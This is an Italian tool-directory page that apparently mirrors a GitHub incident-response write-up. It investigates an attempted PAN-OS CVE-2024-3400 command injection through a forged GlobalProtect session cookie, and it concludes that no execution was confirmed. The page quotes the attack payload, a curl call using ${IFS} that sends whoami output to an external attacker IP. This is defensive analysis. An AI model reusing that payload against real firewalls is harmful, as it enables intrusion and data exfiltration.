Directory degli strumenti
Categorie
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — Indagine su un tentativo di iniezione di comandi PAN-OS CVE-2024-3400, con analisi della consegna del payload, dell'elaborazione interna e della convalida dell'esecuzione sulla base delle evidenze dei log. | Kitploit
Strumenti / GitHub / zedocun / pan-os-cve-2024-3400-command-injection-investigation
zedocun/pan-os-cve-2024-3400-command-injection-investigation PAN-OS-CVE-2024-3400-Command-Injection-Investigation Indagine su un tentativo di iniezione di comandi PAN-OS CVE-2024-3400, con analisi della consegna del payload, dell'elaborazione interna e della convalida dell'esecuzione sulla base delle evidenze dei log.
1 2 4 mesi faScopri gli strumenti più utilizzati dalla nostra community.
Ultimi 7 Giorni Ultimi 30 Giorni
Indagine su un tentativo di command injection PAN-OS CVE-2024-3400
Panoramica
Questo progetto documenta l'indagine su un tentativo di command injection CVE-2024-3400 rivolto a un servizio PAN-OS GlobalProtect.
L'obiettivo era determinare:
se si tratti di un attacco reale
se l'esecuzione di comandi sia avvenuta
se vi siano prove di compromissione
Panoramica dell'avviso
È stato attivato un avviso critico che indica un possibile tentativo di sfruttamento.
Bersaglio: 172.16.17.139 (PA-Firewall-01)
Sorgente: 144.172.79.92
Endpoint: /global-protect/login.esp
Metodo: POST
Azione: Consentita
Payload dannoso
La richiesta contiene un cookie forgiato:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)
Osservazioni chiave
${IFS} aggira il filtraggio degli spazi
whoami tenta di recuperare l'identità del sistema
curl tenta una comunicazione verso l'esterno
Questo è un payload di command injection
Prove dal server web I log di Nginx confermano che la richiesta ha raggiunto il server:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl
La richiesta dannosa è stata accettata ed elaborata.
Elaborazione interna I log di sistema mostrano che il payload ha raggiunto la logica interna:
Riscontro chiave
il payload è stato incorporato nel comando interno (dt_curl)
tentata richiesta verso l'esterno
la catena di esecuzione ha raggiunto componenti interni
La risoluzione DNS è fallita → la comunicazione verso l'esterno è fallita
Infrastruttura dell'attaccante
144.172.79.92
segnalato come dannoso
associato a un provider di hosting
Ciò conferma l'origine esterna dell'attaccante.
Cronologia di rete Più IP hanno interagito con il sistema prima dell'attacco:
Solo 144.172.79.92 è direttamente collegato all'exploit.
Valutazione dell'impatto
Confermato
tentativo di sfruttamento mirato a CVE-2024-3400
payload dannoso consegnato
richiesta elaborata dal server
payload arrivato all'elaborazione interna
tentativo verso l'esterno attivato
Non confermato
esecuzione di comandi del sistema operativo
output del comando
esfiltrazione di dati
reverse shell
persistenza
movimento laterale
Conclusione Si è trattato di un reale tentativo di command injection .
L'attaccante è riuscito a:
consegnare una richiesta dannosa
iniettare un payload
attivare l'elaborazione interna
non vi è alcuna esecuzione confermata né compromissione del sistema
Classificazione finale Tentativo di Command Injection
Payload elaborato - Nessuna esecuzione o impatto confermato